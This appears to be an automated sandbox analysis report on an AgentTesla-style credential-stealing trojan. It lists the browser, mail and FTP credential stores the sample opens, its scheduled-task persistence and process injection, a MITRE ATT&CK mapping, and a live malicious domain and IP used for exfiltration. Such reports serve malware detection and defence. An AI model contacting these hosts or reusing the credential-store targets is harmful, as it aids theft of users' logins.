              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: Yara match | File source: 0000000B.00000002.532293061.0000000002CF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000002.533369231.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000B.00000000.315331976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.325021706.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 5900, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: nrQtAokXKaSn.exe PID: 1008, type: MEMORYSTR
              MITRE ATT&CK Matrix, listed by tactic (column):

              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: 211 Windows Management Instrumentation; 1 Native API; 1 Scheduled Task/Job; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
              Persistence: 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
              Privilege Escalation: 111 Process Injection; 1 Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
              Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 23 Software Packing; 1 Masquerading; 131 Virtualization/Sandbox Evasion; 111 Process Injection; Indicator Removal from Tools
              Credential Access: 2 OS Credential Dumping; 11 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: 1 File and Directory Discovery; 114 System Information Discovery; 311 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
              Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 11 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
              Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
              Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
              Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
              Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
              Behavior Graph (ID: 756116; Sample: SecuriteInfo.com.Win32.Cryp...; Startdate: 29/11/2022; Architecture: WINDOWS; Score: 100)
              Top-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 9 other signatures
              Process tree: nrQtAokXKaSn.exe started nrQtAokXKaSn.exe, schtasks.exe (which started conhost.exe) and a second nrQtAokXKaSn.exe; SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe started SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, schtasks.exe (which started conhost.exe) and a second SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              nrQtAokXKaSn.exe signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); May check the online IP address of the machine; Machine Learning detection for dropped file
              Files dropped by SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe: C:\Users\user\AppData\...\nrQtAokXKaSn.exe (PE32); C:\Users\user\AppData\Local\...\tmp152E.tmp (XML); SecuriteInfo.com.W....16043.3621.exe.log (ASCII)
              SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe signatures: Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Injects a PE file into a foreign processes
              Child nrQtAokXKaSn.exe, network: mail.strictfacilityservices.com; 3.232.242.170, 443, 49720 AMAZON-AESUS United States; api.ipify.org. Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
              Child SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, network: strictfacilityservices.com 111.118.212.38, 49717, 49722, 587 PUBLIC-DOMAIN-REGISTRYUS India; mail.strictfacilityservices.com; 2 other IPs or domains. Signature: Installs a global keyboard hook

              Source | Detection | Scanner | Label | Link
              SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | 32% | ReversingLabs | Win32.Trojan.AgentTesla |
              SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | 100% | Joe Sandbox ML | |

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | 100% | Joe Sandbox ML | |
              C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | 32% | ReversingLabs | Win32.Trojan.AgentTesla |

              Source | Detection | Scanner | Label | Link | Download
              11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8 | | Download File
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org.herokudns.com | 52.20.78.240 | true | false | | unknown
strictfacilityservices.com | 111.118.212.38 | true | true | | unknown
api.ipify.org | unknown | unknown | false | | high
mail.strictfacilityservices.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designersG | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://UrUbMY.com | nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/bThe | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/s-P | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comdH-u | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/jp/&-c | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://strictfacilityservices.com | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.538758099.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539377168.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y001 | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.orgmail.strictfacilityservices.comaccounts | nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272447141.0000000005A47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271875759.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/staff/dennis.htm/ | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.266402265.0000000005A4C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268520007.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268302757.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm2 | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/-- | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://fontfabrik.com | SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
